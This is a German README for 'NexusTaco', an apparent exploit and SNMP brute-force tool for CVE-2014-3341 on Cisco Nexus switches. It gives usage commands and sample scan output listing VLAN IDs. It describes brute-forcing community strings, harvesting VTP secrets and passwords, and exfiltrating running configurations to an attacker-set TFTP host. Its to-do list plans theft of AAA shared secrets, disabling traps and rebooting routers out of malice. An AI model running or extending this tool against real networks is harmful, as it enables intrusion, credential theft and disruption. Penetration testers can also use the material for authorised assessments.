
CVE-2014-3341 Exploit
CVE-ID: CVE-2014-3341.
Cisco Bug-ID: CSCup85616.
NexusTaco ist ein snmp-Scanner, der sowohl für interne als auch externe Tests verwendet werden kann, um Cisco Nexus-Switches (5000er und 6000er Serie) zu bewerten.
Es gibt viele snmp-Scanner und Brute-Force-Tools, dieses wurde nur der Vollständigkeit halber erstellt. Es hat die folgenden Funktionen:
*Findet Nexus-Switches speziell, da sie auf gefälschte Community-Strings zu antworten scheinen
*Bruteforct VLAN-IDs, die für VLAN-Hopping / Double-Tagging-Angriffe ohne Community verwendet werden können, falls #3 nicht durchkommt (nützlich für interne Tests)
*Bruteforct snmp-Community-Strings, um Folgendes zu finden: **System-Uptime **Konfigurierte Netzwerke (verschaffe mehr Boden) **Dateien und Ordner **VTP-Secret und Passwort (kann geknackt werden, da es md5 ist und möglicherweise das Telnet-Login-Passwort ist, falls vorhanden oder woanders verwendet) **Sobald ein Write-Community-String gefunden wird, wird die laufende Konfigurationsdatei an deine gesetzte IP in argv[2] gesendet. Du musst einen TFTP-Server wie den von SolarWinds oder ähnliches konfigurieren.
TODO:
*Suche noch nach hinterhältigen OID's, die lokal auf dem Switch konfigurierte Benutzernamen liefern können
*Wenn ein privater snmp-Community-String gefunden wird, überprüfe ob ein AAA-Server läuft (und hole das Shared Secret, ob Radius oder TACACS+)
*Zeige eingeloggte Benutzer
*Deaktiviere snmp-Traps
*Überprüfe, ob Port Security konfiguriert ist, falls du deine MAC spoofen musst, um deinen Port nicht zu verlieren (interne Tests).
*Verwende getopt …..
*Router-Neustart über snmp, nur aus Boshaftigkeit.
*Alles andere, was ich vergessen habe.
$ python NexusTaco.py python NexusTaco.py CIDR
$ python NexusTaco.py x.x.x.x/32 127.0.0.1 100
Danke an nmap für die IP-Liste
Finde verwundbare Switches
x.x.x.x:Ist ein nexus switch, Snmp offen, Hat Vlans konfiguriert
Finde VlanIDs auf: x.x.x.x Mit falschem Community-String
Host: x.x.x.x hat VlanID 1 konfiguriert
Host: x.x.x.x hat VlanID 2 konfiguriert
Host: x.x.x.x hat VlanID 3 konfiguriert
Host: x.x.x.x hat VlanID 4 konfiguriert
Host: x.x.x.x hat VlanID 5 konfiguriert
Host: x.x.x.x hat VlanID 6 konfiguriert
Host: x.x.x.x hat VlanID 7 konfiguriert
Host: x.x.x.x hat VlanID 8 konfiguriert
Host: x.x.x.x hat VlanID 10 konfiguriert
Host: x.x.x.x hat VlanID 31 konfiguriert
Host: x.x.x.x hat VlanID 32 konfiguriert
Host: x.x.x.x hat VlanID 33 konfiguriert
Host: x.x.x.x hat VlanID 34 konfiguriert
Host: x.x.x.x hat VlanID 35 konfiguriert
Host: x.x.x.x hat VlanID 40 konfiguriert
Host: x.x.x.x hat VlanID 64 konfiguriert
Host: x.x.x.x hat VlanID 65 konfiguriert
Host: x.x.x.x hat VlanID 97 konfiguriert
Host: x.x.x.x hat VlanID 98 konfiguriert
Host: x.x.x.x hat VlanID 99 konfiguriert
Host: x.x.x.x hat VlanID 100 konfiguriert
.....